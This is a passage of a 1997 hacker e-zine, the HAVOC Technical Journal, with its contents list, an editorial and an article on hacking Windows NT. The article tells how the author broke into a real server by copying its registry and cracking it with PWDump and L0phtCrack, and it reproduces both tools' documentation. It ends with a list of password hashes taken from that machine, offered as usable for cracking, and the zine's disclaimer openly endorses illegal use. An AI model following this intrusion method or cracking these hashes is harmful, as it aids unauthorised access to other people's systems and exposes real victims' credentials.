home *** CD-ROM | disk | FTP | other *** search
/ Cuteskunk BBS / cuteskunk.zip / cuteskunk / unsorted-zines / thtj13.txt < prev    next >
Text File  |  2003-06-29  |  162KB  |  3,847 lines

  1. ╒══════════════════════════════════════════════════════════════════╕
  2. │The HAVOC Technical Journal     - http://www.thtj.com -           │▒ 
  3. └──────────────────────────────────────────────────────────────────┘▒ 
  4.  ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ 
  5.  
  6. Vol. 2 | No. 1 | August 1st, 1997 | A HAVOC Bell Systems Publication 
  7. Issue 13                   "Expand your mind." 
  8. _____________________________________________________________________________ 
  9.  
  10.                            -[The HAVOC Technical Journal Issue 13]- 
  11.                     Editorial..............................Scud-O 
  12.                     NT Hacking.............................WaRsPrItE 
  13.                     Breaking out of Freenet Menu Shell.....N-TREEG 
  14.                     How to hack military e-mail servers....WaRsPrItE 
  15.                     DNS Scanner - dns.c....................memor 
  16.                     Connection Hijacking Attack............Merde Fuk 
  17.                     One method to keep root................WaRsPrItE 
  18.                     Carding..more basics for the lame......ArcAngl 
  19.                     Cellular Programming Archives, Pt. I...Phrax 
  20.                     Basic Social Engineering...............WaRsPrItE 
  21.                     DTMF Decoding..........................ArcAngl 
  22.                     Redneck Phreaking......................shoelace 
  23.                     Basic UNIX Scripting...................WaRsPrItE 
  24.                     KEEPING UP WITH THE TELCOS.............ArcAngl 
  25.                     The Weather Report: Federal Numbers....WeatherM 
  26.                     Fake IDs...............................N-TREEG 
  27.                     Oddville, THTJ.........................Scud-O 
  28.                     The News...............................KungFuFox 
  29.                     Logs...................................THTJ 
  30.                                  
  31.                     ------------------------------------------------- 
  32.  
  33. _____________________________________________________________ 
  34.  
  35. The HAVOC Technical Journal - Information 
  36. - Editor in Chief : Scud-O, scud@thtj.com 
  37. - Assitant Editor : KungFuFox, mazer@cycat.com   
  38. - Submissions Editor: Keystroke, keystroke@thepentagon.com 
  39. - THTJ email address: thtj@thtj.com 
  40. - THTJ website: http://www.thtj.com 
  41. - THTJ mailing address: PO BOX 448 Sykesville, MD 21784 
  42.  
  43.   The HAVOC Technical Journal Vol. 2, No.1, August 1st, 1997.   
  44.   A HAVOC Bell Systems Publication.  Contents Copyright (⌐)  
  45.   1997 HAVOC Bell Systems Publishing.  All Rights Reserved.   
  46.   No part of this publication may be reproduced in whole or  
  47.   in part without the expressed written consent of HAVOC  
  48.   Bell Systems Publishing.  [No copying THTJ, damnit.] 
  49.    
  50.   The HAVOC Technical Journal does in no way endorse the  
  51.   illicit use of computers, computer networks, and  
  52.   telecommunications networks, nor is it to be held liable  
  53.   for any adverse results of pursuing such activities. 
  54.   [Actually, to tell you the honest to goodness truth, we       
  55.   do endorse that stuff.  We just don't wanna get in trouble  
  56.   if you try it for yourself and something goes wrong.] 
  57.  
  58.                                                     
  59.   For infomation about using articles published in THTJ, send mail to: 
  60.                                         e-mail: thtj@thtj.com 
  61.                          mail:   THTJ 
  62.                                     c/o HBS 
  63.                                     PO Box 448 
  64.                                     Sykesville, MD 21784 
  65. _____________________________________________________________ 
  66. [Editorial : by Scud-O]  Expanding one's mind 
  67.  
  68.            This month I would like to talk to you about a topic that needs to 
  69. be addressed. We as a species have begun to slow our development. Nature 
  70. leaves survival to the fittest, but with today's technology, more people than 
  71. we should have survive. This may sound great, but for a species to advance, 
  72. we need to have this survival of the fittest. The best way i can see to 
  73. accomplish this is by expanding one's mind. A fast mind can own a fast body 
  74. any day. Now, by being a hacker you do show a strive to expand your mind. And 
  75. this is good, but only 'real' hacking ( i.e. finding new holes, working to 
  76. trace connections and data flow thru machines is real hacking to me. ) mail 
  77. bombing, and anarchy are not hacking. they do not expand one's mind. Cookbook 
  78. hacking is also not a method to expand your mind. By using a 'cookbook' to 
  79. hack you are in fact shutting your mind off. You are simply following 
  80. directions, and what serious thought is expelled on that? none. 
  81.            Expanding your mind uses all of your senses. Expanding your mind 
  82. expands to more than just hacking. New experiences help to increase your 
  83. knowledge, and thus your mind. Try new things. If early cave men had not 
  84. rubbed two wooden sticks together, would we have fire? no. And where would we 
  85. be today if we had not discovered fire? Still in a cave. Our minds are waiting 
  86. to be expanded. We still have 90% of our brain left to use up. If we don't 
  87. expand ourselves, it would be an awful waste of space, would it not? So 
  88. go on, expand yourself. 
  89.  
  90.                          Scud-O , Founder, and Editor in Chief of THTJ 
  91.  
  92.  
  93.                          +----------------------------------------+ 
  94.            Scud-O and HBS would like to hear your views on this issue. 
  95.            Please feel free to e-mail us at: scud@thtj.com 
  96.  
  97.     ---------------------------------------------- 
  98.   /       ---/   --/  /   /  |  /------/   /    / 
  99.  /---       /-----/------/-----/      /   /    / 
  100. /----------/                         /--------/ 
  101.                    -of HAVOC Bell Systems- 
  102.  
  103.             scud@thtj.com | http://www.thtj.com 
  104.  
  105. ------- 
  106.  
  107. ╒══════════════════════════════════════════════════════════════════╕ 
  108. │The Playlist - by Scud-O               - for July 1997 -          │▒ 
  109. └──────────────────────────────────────────────────────────────────┘▒ 
  110.  ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ 
  111.  
  112.  This list comes from Scud-O's house and car stereos, and these were his 
  113.  most played CD's during the month of July. 
  114.  
  115.  These are not organized into anyway, it is just written up as Scud-O finds 
  116.  the CD laying around his house. 
  117.  
  118.  Artist                                 Title                             
  119.  ------                                 ---------------- 
  120.  Various                                Saturday Night Fever Soundtrack    
  121.  Various                                sm:)e mix session 1 by dj scott henry              
  122.  Atari Teenage Riot                     Burn, Berlin, Burn! 
  123.  The Future Sound of London             Accelerator 
  124.  The Future Sound of London             Dead Cities 
  125.  Various                                Songs in the key of x ( X-Files ) 
  126.  Fugees                                 The Score 
  127.  Squirrel Nut Zippers                   Hot 
  128.  Beck                                   Odelay 
  129.  The Prodigy                            Experience 
  130.  The Prodigy                            Music for the Jilted Generation 
  131.  Prodigy                                The Fat of the Land 
  132.  Soul Coughing                          Ruby Vroom 
  133.  Soul Coughing                          Irrestable Bliss 
  134.  wyclef jean                            The Carnival 
  135.  Adam Sandler                           They're all gunna laugh at you! 
  136.  Various                                MTV's amp 
  137.  
  138.  
  139.  
  140.  Next Month: Scud-O's entire CD collection ( god is that gunna take a while to 
  141.                    type up! )  
  142.  
  143. _____________________________________________________________ 
  144. NT Hacking by WaRsPrItE 
  145.  
  146. =================================== 
  147. =           Contents              = 
  148. =================================== 
  149. I.   WaRsPrItE's talk on NT Hacking 
  150. II.  Info on the pwdump Utility 
  151. III. Info on L0phtCrack 
  152. IV.  The Password file tested 
  153. V.   Results                       
  154. =================================== 
  155.  
  156.  
  157.  
  158. I.   WaRsPrItE's talk on NT Hacking 
  159. ----------------------------------- 
  160.  
  161.  
  162. -----BEGIN PGP SIGNED MESSAGE----- 
  163.  
  164.         First off, I'd like to say that I think that this is an excellent 
  165.            utility for checking the security of NT networks. However, just like 
  166.            the now infamous and much over-hyped "SATAN" it's not the skeleton 
  167.            key into any NT network. 
  168.  
  169.         As I say in every fucking article I write, the key is in the basics. 
  170.            If users pick good passwords then they are next to impossible to 
  171.            crack. For example, if you use upper case, lower case, and numbers 
  172.            then there are 1.240176943466 x 10(25) possible combinations. Now add 
  173.            some punctuation to that! Remember in NT the password can be up to 14 
  174.            charaters as opposed to the 8 in *NIX. Just to put that that in 
  175.            perspective, the sun will go nova in about 1.0 x 10(10) years and in 
  176.            about 1.0 x 10(21) years until all orbits decay by gravitational 
  177.            radiation. So needless to say my little brute force attack was futile 
  178.            at best :). 
  179.  
  180.         The two programs I used in the attack were L0phtCrack and PWDUMP. I 
  181.            must say that PWDump [by Jeremy Allison, jra@cygnus.com] works 
  182.            beautifully. Provided you're logged in as "administrator". So why use 
  183.            it to hack then?! Because it'll work on any copy of a registry! If 
  184.            you can swipe some backup media from the server room that might have 
  185.            a copy of the registry on it :). The NT I exploited and who's password 
  186.            hashes I included in this zine, I hacked because the moron sysadmin 
  187.            allowed Domain users to log on locally on the server. During 
  188.            installation NT asks if you want to make emergency repair disks 
  189.            (rdisk.exe) and the default choice is "yes". Everytime you run rdisk 
  190.            NT stores a copy of the Registry in %SystemRoot%\Repair. And the 
  191.            default permission of that directory is "read" for normal users. Piece 
  192.            of cake to get a copy of the registry. The problem is, that any 
  193.            passwords that have been changed since the the last time rdisk was 
  194.            run won't work (minor glitch). Now that you have a copy of the 
  195.            registry what do you do with it? Well, find an NT machine that you 
  196.            can login as "administrator" and run PWDump.exe. In this case I 
  197.            brown nosed some warez fags and installed it at home :). After that 
  198.            it's pretty simple, run L0phtCrack.exe with your favorite wordlist or 
  199.            use it in brute force mode. It took me 6 days on a Pentium 133 to get 
  200.            three accounts. Amazingly,it got passwords that were 6 charaters long! 
  201.            Cudos to L0pht! 
  202.  
  203.  
  204. -----BEGIN PGP SIGNATURE----- 
  205. Version: PGP for Personal Privacy 5.0 
  206. Charset: noconv 
  207.  
  208. iQEVAwUBMeMcqX5eXk/jGmY7AQH1yQf/YFpgsAk7iIPEcfOUTiUJ17O2KhujgSfl 
  209. 8xZgC7gIHR98uzSwqlJerXQlYUFUfNj7CZvO2/SJMeV8bU/bLFF7Ki9zmo+57vkH 
  210. z6HfzcF4Wyy/o7y854jOQBPfsXQd6+Nbivc1l1sriaQ4H25hxhLkXA1UFchWD9hk 
  211. 8xv5nSDPZxlCHobWau/sK+Of92DfFQV1Fw2v5Kyeo0jiWZItaghlMvfYu3eeGtQ0 
  212. 8sTNg4BDiHQeoQ9/cG+zapKa6UZcPZLyQHXCF36zz23Rtm7bC0jMqUv5BONgWk4W 
  213. cuptOS+pmZqsDhf3XWPEHTaugZSluEGUd9A34siF/wjmGwgXN8cO9w== 
  214. =yiB2 
  215. -----END PGP SIGNATURE----- 
  216.  
  217.  
  218.  
  219. II.  Info on the pwdump Utility 
  220. ------------------------------- 
  221.  
  222.         Windows NT Password Dump Utility 
  223.            -------------------------------- 
  224.  
  225. This handy utility dumps the password database of an NT machine that 
  226. is held in the NT registry (under 
  227. HKEY_LOCAL_MACHINE\SECURITY\SAM\Domains\Account\Users) into a valid 
  228. smbpasswd format file. This should be a help to Samba administrators 
  229. who have a master password database on a Windows NT machine and need 
  230. to keep this in sync with the smbpasswd file on their UNIX/Samba 
  231. server. 
  232.  
  233. This utility dumps NT password entries in the format : 
  234.  
  235. <user>:<id>:<lanman pw>:<NT pw>:comment:homedir: 
  236.  
  237. Where <user> is the user-name on Windows NT, <id> is the Windows NT 
  238. RID (relative ID) - the last 32 bit component of the Windows NT users 
  239. SID, <lanman pw> is the users lanman password hash, <NT pw> is the 
  240. users Windows NT (md4) password hash - note that if the user has no 
  241. password these will be dumped as the string 'NO PASSWORD*****', if the 
  242. account is disabled or invalid these are dumped as 32 '*' 
  243. characters. The comment is a concatenation of the users full name on 
  244. Windows NT and the description field in the Windows NT user-manager 
  245. program. The homedir cannot contain ':' characters unfortunately, as 
  246. these are used as field separators in the smbpasswd file (as per 
  247. UNIX), all ':' characters after drive letters are dumped as '_' 
  248. characters. 
  249.  
  250. How to use pwdump  
  251. ----------------- 
  252.  
  253. Only as a suggestion, I would recommend dumping your NT machines 
  254. account database and then creating regular UNIX users (in /etc/passwd) 
  255. with the same UNIX account numbers as their NT RID - this will make 
  256. replicating the smbpasswd file much easier later on. These /etc/passwd 
  257. accounts may have disabled password entries, prohibiting the NT users 
  258. from logging onto the UNIX box via telnet (this is similar to removing 
  259. the 'log on locally' right on an NT server). This will not prohibit 
  260. them from using the Samba box as a server via Samba though. The 
  261. created smbpasswd file may then be copied to the 
  262. $SAMBA/private/smbpasswd file (where $SAMBA is the base directory you 
  263. installed Samba into). If Samba is set up for user level security and 
  264. encrypted passwords (set : 
  265.  
  266. security = user encrypted passwords = yes 
  267.  
  268. in your smb.conf file) then Windows NT / 95 users who have logged on 
  269. to the NT domain will be able to transparently access the resources on 
  270. the Samba box as their correct UNIX user id's (the ones you originally 
  271. created). You can then set up a 'AT' job on your NT server to 
  272. periodically dump your NT password database into a new smbpasswd file 
  273. and copy it over (securely somehow) to the Samba server to keep the 
  274. password databases on the two machines in sync. 
  275.  
  276. The pwdump.exe utility can take a \\machine name as argument, it will 
  277. then proceed to dump the password database from that machine instead 
  278. of the local machine, if it has sufficient privillages to do so. By 
  279. default it will dump the password database of the local machine. 
  280.  
  281. NOTE: The passwords dumped by this utility are 'plain-text equivalent' 
  282. in the CIFS protocol and *MUST* be protected. The UNIX security on the 
  283. smbpasswd file *MUST* be set to (owner root, permissions rw------- - 
  284. ie. read/write owner, no access to anyone else). 
  285.  
  286.  
  287. Future Enhancements  
  288. ------------------- 
  289.  
  290. As this code decrypts the obfuscication step in the NT password 
  291. database it may be reversed, allowing a lanman and md4 hash to be 
  292. written into the NT registry for a user account. This would allow a 
  293. UNIX/Samba box to be the master repository for user account details, 
  294. and the account passwords to be replicated and 'brute forced' into the 
  295. NT password database, bypassing the rather baroque NT API mechanisms. 
  296.  
  297. This code doesn't attempt to do this however, this is left as an 
  298. 'exercise to the reader' (or an enterprising university somewhere :-). 
  299.  
  300.  
  301. How it works  
  302. ------------ 
  303.  
  304. This utility takes great pains to maintain NT security as it wanders 
  305. through the NT SAM areas of the registry. It will not even run is you 
  306. are not running as Administrator. Firstly it goes through and adds the 
  307. 'minimum necessary change' (see Asimov's 'the End of Eternity' :-) to 
  308. allow the program to read the password entries. It dumps the users 
  309. entries (see the code for details) and then goes back through the 
  310. registry restoring the security on all the keys it touched. I have 
  311. tested this code on NT Server/Workstation 4.0 and NT 3.51 and have 
  312. never had problems, but as always, this code has *NO GUARANTEE* 
  313. associated. 
  314.  
  315. Source code  
  316. ----------- 
  317.  
  318. The source code for this utility may be found in  
  319.  
  320. ftp://samba.anu.edu.au/pub/samba/pwdump/pwdump.c 
  321.  
  322. Note that this code needs a DES library to compile. The one I used in 
  323. development is Eric Young's excellent DES library found at : 
  324.  
  325. ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-4.01.tar.gz 
  326.  
  327. which compiles fine under Windows NT. I used Microsoft Visual C++ 4.x 
  328. as the compile environment. The code pwdump.exe is provided for people 
  329. who do not have a compiler and is a binary of the program for x86 NT 
  330. machines (are there any other kind :-). 
  331.  
  332. Please report all bugs to : 
  333.  
  334. Jeremy Allison, 
  335. jra@cygnus.com 
  336.  
  337.                 libdes, Version 4.01 13-Jan-97 
  338.  
  339.                 Copyright (c) 1997, Eric Young 
  340.                           All rights reserved. 
  341.  
  342.     This program is free software; you can redistribute it and/or modify 
  343.     it under the terms specified in COPYRIGHT. 
  344.      
  345. -- 
  346. The primary ftp site for this library is 
  347. ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-x.xx.tar.gz 
  348. libdes is now also shipped with SSLeay.  Primary ftp site of 
  349. ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-x.x.x.tar.gz 
  350.  
  351. The best way to build this library is to build it as part of SSLeay. 
  352.  
  353. This kit builds a DES encryption library and a DES encryption program. 
  354. It supports ecb, cbc, ofb, cfb, triple ecb, triple cbc, triple ofb, 
  355. triple cfb, desx, and MIT's pcbc encryption modes and also has a fast 
  356. implementation of crypt(3). 
  357. It contains support routines to read keys from a terminal, 
  358. generate a random key, generate a key from an arbitrary length string, 
  359. read/write encrypted data from/to a file descriptor. 
  360.  
  361. The implementation was written so as to conform with the manual entry 
  362. for the des_crypt(3) library routines from MIT's project Athena. 
  363.  
  364. destest should be run after compilation to test the des routines. 
  365. rpw should be run after compilation to test the read password routines. 
  366. The des program is a replacement for the sun des command.  I believe it 
  367. conforms to the sun version. 
  368.  
  369. The Imakefile is setup for use in the kerberos distribution. 
  370.  
  371. These routines are best compiled with gcc or any other good 
  372. optimising compiler. 
  373. Just turn you optimiser up to the highest settings and run destest 
  374. after the build to make sure everything works. 
  375.  
  376. I believe these routines are close to the fastest and most portable DES 
  377. routines that use small lookup tables (4.5k) that are publicly available. 
  378. The fcrypt routine is faster than ufc's fcrypt (when compiling with 
  379. gcc2 -O2) on the sparc 2 (1410 vs 1270) but is not so good on other machines 
  380. (on a sun3/260 168 vs 336).  It is a function of CPU on chip cache size. 
  381. [ 10-Jan-97 and a function of an incorrect speed testing program in 
  382.   ufc which gave much better test figures that reality ]. 
  383.  
  384. It is worth noting that on sparc and Alpha CPUs, performance of the DES 
  385. library can vary by upto %10 due to the positioning of files after application 
  386. linkage. 
  387.  
  388. Eric Young (eay@mincom.oz.au) 
  389.  
  390.  
  391.  
  392. ---- 
  393.  
  394. III. Info on L0phtCrack 
  395. ----------------------- 
  396.  
  397.  
  398.  
  399.  
  400.                                    L0pht Security Advisory 
  401.                                 Advisory released April 10 1997 
  402.  
  403.             Program: L0phtcrack.exe - Windows NT password insecurities 
  404.  
  405.                    Vulnerability Scope: Windows NT 
  406.  
  407.            Severity: The L0pht is pleased to release L0phtcrack rev 1.  
  408.                    This program recovers the LANMAN and/or NT Dialect 
  409.                    MD4 plaintext password from output derived from the 
  410.                    SAM registry. 
  411.  
  412.                             Authors: mudge@l0pht.com 
  413.                                            weld@l0pht.com 
  414.  
  415. Intro: 
  416.    
  417.   This tool, as with many others, can be used for breaking into systems 
  418.   in illegal fashions - THAT IS NOT WHAT IT IS INTENDED FOR! We had a 
  419.   working version done the same day that PWDump was released in order 
  420.   to audit some of our internal networks. However, as we started 
  421.   researching more into it we noticed many shortcomings in how MS 
  422.   security is handled and present some of these in our tool. We take 
  423.   no responsibility for misuse of this information. It is our belief 
  424.   that the only way to protect yourself is to fully understand your 
  425.   vulnerabilities. Unfortunately, for some of these problems we still 
  426.   don't see immediate solutions. Our particular solution has been to 
  427.   trust our users, and not let any of our NT machines talk to the internet 
  428.   (ie filtered very tightly at the perimiter). We are interested in 
  429.   other solutions. 
  430.    
  431. Overview: 
  432.  
  433.   Recently several NT password crackers have emerged. We offer this 
  434.   one with the belief that it offers some features and functionality 
  435.   that the current ones do not have. 
  436.  
  437.   L0phtcrack will recover passwords from Windows NT registries in a  
  438.   variety of fashions.  
  439.  
  440.   By feeding in the output from PWDump [by Jeremy Allison, jra@cygnus.com]  
  441.   and a dictionary file, L0phtcrack rev 1 will attempt to retrieve:  
  442.  
  443.     1) only the LANMAN plaintext password 
  444.     2) only the NT Dialect MD4 plaintext password [see reasoning below] 
  445.     3) Both the LANMAN and MD4 plaintext passwords (by deriving the 
  446.           MD4 password from the LANMAN output and running through up to 
  447.           2 to the Nth power permutations) 
  448.  
  449.   Alternatively, L0phtcrack gives you the capability to _brute force_ the 
  450.   entire key space and recover ALL USER PASSWORDS up to 14 characters in  
  451.   length.  
  452.  
  453.   By going through the entire keyspace available, this program 
  454.   WILL RETURN ALL OF THE PLAINTEXT PASSWORDS (both LANMAN and MD4) up to 
  455.   and including 14 characters in length (note that the User Login Dialog 
  456.   box on NT machines limits the amount of characters that can be typed 
  457.   to 14 for the MD4 dialect. Future releases of this software will enable 
  458.   brute forcing of up to 16 characters for MD4). 
  459.  
  460.   L0phtcrack comes in three flavours: 
  461.  
  462.     1) A nice Windows GUI interface so you can point and click. 
  463.     2) A CLI version for running in "DOS" windows. 
  464.     3) Source code that is generic enough to build on most Un*x's. 
  465.  
  466. Description: 
  467.  
  468.   Here's how it works - 
  469.  
  470.   For NT, LANMAN passwords are derived in the following fashion: 
  471.  
  472.     . The user password is converted to UPPERCASE 
  473.     . If the user password is less than 14 bytes, the password is padded  
  474.          with NULL characters to 14 bytes. 
  475.     . If the user password is greater than 14 bytes, the password is 
  476.          truncated to 14 bytes. 
  477.     . The 14 byte string is split down the middle into two 7 byte strings. 
  478.     . One 8 byte odd parity des key is derived from each of the 7byte 
  479.          strings [note1].  
  480.     . The constant 'magic value' [note2] is then encrypted first  
  481.          with the first odd parity des key and then with the second. The results 
  482.          are concatenated. This is the LANMAN OWP [note3]. 
  483.  
  484.     [note1: There is a significant loss of bits in the str_to_key functions 
  485.         which derive the 8 byte odd parity DES keys from the 7 byte strings. 
  486.         This knocks down the possibly key space to attack DES substantially. 
  487.         Thanks to Hobbit@avian.org for pointing this out to us] 
  488.  
  489.     [note2: the constant 'magic value' is derived from the encryption 
  490.         of 0x4B47532140232425 with a key of all 1's ] 
  491.  
  492.     [note3: quickly scanning the LANMAN OWP's it is easy to see who has 
  493.         passwords that are 7 characters or less. If the second half of the 
  494.         LANMAN OWP is 0xAAD3B435B51404EE the value for the last seven characters 
  495.         in the user password were all NULLs.] 
  496.  
  497.   For NT, NT Dialect MD4 passwords are derived in the following fashion: 
  498.  
  499.     . The users password is converted to Unicode [note4]. 
  500.     . The unicode password is run through MD4 to return a 16 byte value. 
  501.          This is the MD4 OWP [note5] [note6]. 
  502.  
  503.     [note4: There is a large amount of confusion as to where Unicode stops. 
  504.         i.e. is "ABC", which is in actuallity 'A','B','C','\0', encoded 
  505.         as 'A' '\0' 'B' '\0' 'C' '\0' or 'A' '\0' 'B' '\0' 'C' '\0' '\0' '\0'. 
  506.         We find that in this situation the former is the case. 
  507.  
  508.     [note5: You might say "why do you even bother having an option of doing 
  509.         _only md4_ when it is much quicker to derive it from the LANMAN 
  510.         password". To which we would reply "this gives us the ability to 
  511.         easilly roll in the ability to dictionary attack traffic that we 
  512.         see on the network. This will be particularly important if the 
  513.         proposed changes to the CIFS spec go into place. See our S/Key 
  514.         cracker MONKEY for more of an idea on what's to come".] 
  515.  
  516.     [note6: For those who were building md4 crypt-n-compare engines from 
  517.         inside Microsoft's Visual C++ IDE. The VC++ does not by default 
  518.         define _MSDOS_, or 8086 which are necesarry to through the byte 
  519.         ordering into the correct mode in md4.c] 
  520.  
  521.   What we do in rev 1 - 
  522.  
  523.     In rev 1 of l0phtcrack the user must hand in a password file 
  524.     in the format of Jeremy Allison's PWDump output. From this 
  525.     the following actions can be taken. 
  526.  
  527.     LANMAN only -  
  528.          A dictionary is fed in and each word is encrypted using the 
  529.          LANMAN one round DES format as described above. The list of 
  530.          users is checked against this encrypted OWP. Any that are  
  531.          found matching are flagged. 
  532.  
  533.     MD4 only - 
  534.          A dictionary is fed in and each word is encrypted using 
  535.          md4. The list of users is checked against this encrypted OWP. 
  536.          Any that are found matching are flagged. See the description 
  537.          of rev 2 for why this option is important. 
  538.  
  539.     LANMAN and md4 - 
  540.          A dictionary is fed in and each user is first checked against 
  541.          the LANMAN one round DES OWP. If a match is found, the word 
  542.          is run through 2 to the power of strlen(word) case permutations  
  543.          in md4 to return the case sensitive md4 value. 
  544.  
  545.     Brute force - 
  546.          An input string containing the list of valid characters is  
  547.          run through sequentially in all possible combinations up to 
  548.          7 characters in length. The first half and second half of the 
  549.          LANMAN password are compared against these, thus returning 
  550.          all passwords up to 14 characters in total length. Since the 
  551.          logon screen will not allow you to enter more than 14 characters 
  552.          ,even though the NT MD4 dialect will allow up to 128, this 
  553.          should return all users passwords. When a match is found 
  554.          the word is run through 2 to the power of strlen(word). 
  555.    
  556.          By changing the default string that is processed through you 
  557.          can drastically change the amount of time it takes to brute 
  558.          through the entire keyspace. Keep in mind that the following 
  559.          characters are not valid in passwords so they don't need to 
  560.          be included: '/', '\', '[', ']', ':', ';', '|,' ,'=', ',',  
  561.          '+', '*', '?', '<', '>' [according to the MS technet information]. 
  562.          For example: if you just want to check all combinations of letters 
  563.          all you have to run through is ABCDEFGHIJKLMNOPQRSTUVWXYZ. 
  564.    
  565.          rev 2 will have this optimized a bit more, in addition to allowing 
  566.          a remote querry to our tables of precomputed hashes, thus reducing 
  567.          the problem to that of a table lookup. 
  568.  
  569.   Why is it important to be able to attack md4 only? That is much 
  570.   slower! 
  571.           
  572.          The changes being made to the CIFS spec imply that in the future 
  573.          a server will be able to force a client to use the NT dialect  
  574.          and not negotiate down. Based upon how the "key exchange" is 
  575.          done this will be attackable via the hooks put in for md4 only 
  576.          much in a similar way that our program "MONKEY" will attack 
  577.          s/key sessions based upon promiscuously viewed network traffic. 
  578.  
  579.   errata in rev 1 - 
  580.           
  581.          Several of the routines need to be optimized a bit more but the 
  582.          tool is quite usable and quite fast as it is (100 users and an 
  583.          an 8 meg dictionary file took under 1 minute on a PPRo 200 
  584.          with the GUI version. The CLI is slightly faster - the bruting  
  585.          with a string of "ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789-_"  
  586.          took a little over 3 days on a P133). 
  587.  
  588.          There are hooks to preen through the user list and instantly kick 
  589.          out whether a user has a password of 7 characters or less, or 
  590.          if a users password is greater than 7 chars. 
  591.  
  592.          If you specify md4 only it just does a straight dictionary  
  593.          crypt and compare, if you specify any other method that returns 
  594.          md4 values it runs through all case possibilities.  
  595.  
  596.          The brute forcer is not implemented in the windows GUI version. Use 
  597.          the command line version for this functionality. 
  598.  
  599.   What you can expect to see in rev 2 - 
  600.  
  601.     . The functionality of PWDump will be included in the l0phtcrack 
  602.          program so you won't need to run seperate programs. 
  603.  
  604.     . You should be able to pull down registries from remote / local 
  605.          machines WITHOUT BEING ADMINISTRATOR and WITHOUT NEEDING TO 
  606.          KNOW THE ADMINISTRATOR's PASSWORD [read this bullet item again!!!] 
  607.          - we believe we are very close to being able to do this now. 
  608.  
  609.     . You will be able to brute force the NT Dialect password up to 
  610.          16 characters in length for those tricky network users that 
  611.          never log in via the console. 
  612.  
  613.     . The windows GUI will be multi-threaded to take advantage of  
  614.          multiple processors for dramatically improved brute forcing. 
  615.   
  616.     . We should have pre-computed tables of the entire key-space  
  617.          available so all that needs to be done is a remote table look 
  618.          up. 
  619.  
  620.  L0phtcrack is freely available from the l0pht advisories page:  
  621.    http://www.l0pht.com/advisories.html  
  622.    screenshots should be available on the web page in the next couple 
  623.    of days. 
  624.  
  625.  If anyone makes modifications / improvements please mail the diffs to 
  626.  mudge@l0pht.com. 
  627.  
  628.  We hope this tool is usefull, 
  629.  
  630.  mudge@l0pht.com , weld@l0pht.com 
  631.  
  632. -------------- 
  633. For other advisories check out http://www.l0pht.com/advisories.html 
  634. -------------- 
  635.  
  636.  
  637.  
  638. IV.  The Password file tested 
  639. ------------------------------ 
  640.  
  641. I edited this to cover my ass and for space requirements. 
  642. But it's still a valid file for cracking purposes. 
  643.  
  644. Administrator:500:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  645. Guest:501:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  646. <user name>:1004:ACAA2B2B4DB1C2F509752A3293831D17:CA45A13FD16012BF33AA68CDFE061FCD:<user name>:: 
  647. ccrouter:1009:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: 
  648. <user name>:1010:9C0E16584A1066E6C2265B23734E0DAC:3BC5E21044369A593A461ABB6942A8A5:<user name>:: 
  649. <user name>:1011:D30B776BDA67C893AAD3B435B51404EE:9507A8AD5A9BDFC54E08F713CB74764F:<user name>:: 
  650. <user name>:1012:1E074F8EF51098B2AAD3B435B51404EE:4F99B255DB7C1852ED01A80576202901:<user name>:: 
  651. <user name>:1013:904021AAA178696DAAD3B435B51404EE:E8CD0E4A9E89EAB931DC5338FCBEC54A:<user name>:: 
  652. <user name>:1014:0A5A9AD4C8774E46C2265B23734E0DAC:6ABC3FA6A76801DFFC63BE7565CFD666:<user name>:: 
  653. <user name>:1015:3F109A599C4324BD93E28745B8BF4BA6:CA162D1F614293BC30686E0AC2F0E67A:<user name>:: 
  654. <user name>:1016:7CF5973DF34EA1443B80EEA293B236B6:3E5CC1D5EDB4B91334EFEEF1258D3E50:<user name>:: 
  655. <user name>:1017:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  656. <user name>:1018:9EF072AE87B5C9C4AAD3B435B51404EE:6FF0D8A475E5C5B0DFD6A8676F18A829:<user name>:: 
  657. <user name>:1019:6166F0244140F965AAD3B435B51404EE:ECF1BE0786D6E49470107CAB4E3B3E7B:<user name>:: 
  658. <user name>:1020:BE4C45E3524EF720F500944B53168930:8BB50ADC452C4EE196775B7B5008B341:<user name>:: 
  659. Supervisor:1026:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: 
  660. FPNW Service Account:1027:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: 
  661. <user name>:1030:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  662. <user name>:1040:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  663. <user name>:1041:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  664. <user name>:1042:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  665. <user name>:1043:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  666. <user name>:1044:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  667. <user name>:1045:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  668. <user name>:1046:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  669. <user name>:1047:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
